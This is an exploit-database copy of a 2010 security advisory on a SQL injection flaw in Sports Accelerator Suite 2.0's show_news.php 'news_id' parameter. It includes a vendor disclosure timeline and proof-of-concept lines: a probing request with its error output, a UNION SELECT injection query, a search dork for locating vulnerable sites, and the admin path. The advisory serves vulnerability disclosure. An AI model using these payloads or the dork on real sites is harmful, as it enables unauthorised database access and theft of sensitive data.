Sports Accelerator Suite 2.0 - news_id Remote SQL Injection Vulnerability

ID EDB-ID:14645
Type exploitdb
Reporter LiquidWorm
Modified 2010-08-14T00:00:00


Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                             Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability

 Vendor: Athlete Web Services, Inc. / AWS Sports
 Product Web Page:

 Summary: Content Management System (PHP+MySQL).

 Description: The CMS is vulnerable to an SQL Injection attack when input is
 passed to the "news_id" parameter. The script fails to properly sanitize the
 input before being returned to the user allowing the attacker to compromise
 the entire DB system and view sensitive information.


 GET .../show_news.php?news_id=xx%27

 1064 - You have an error in your SQL syntax. Check the manual that corresponds
 to your MySQL server version for the right syntax to use near '\'' at line xx.


 Affected Version: 1.1 and 2.0

 Tested On: Microsoft IIS 6.0
            MySQL 4.0.15-log
            PHP 4.3.3

 Vulnerability Discovered By: Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Vendor Status: [05.06.2010] Vulnerability discovered.
                [09.08.2010] Vendor contacted.
                [13.08.2010] No response from vendor.
                [14.08.2010] Public advisory released.

 Zero Science Lab Advisory ID: ZSL-2010-4949
 Advisory URL:



 Dork: "Designed and powered by AWS Sports"

 Query: http://vulnpage.tld/show_news.php?news_id=xx+and+1=0+%20union%20select%20database%28%29,2,3,4,5,6,7..[n]

 Admin: http://vulpage.tld/admin/index.php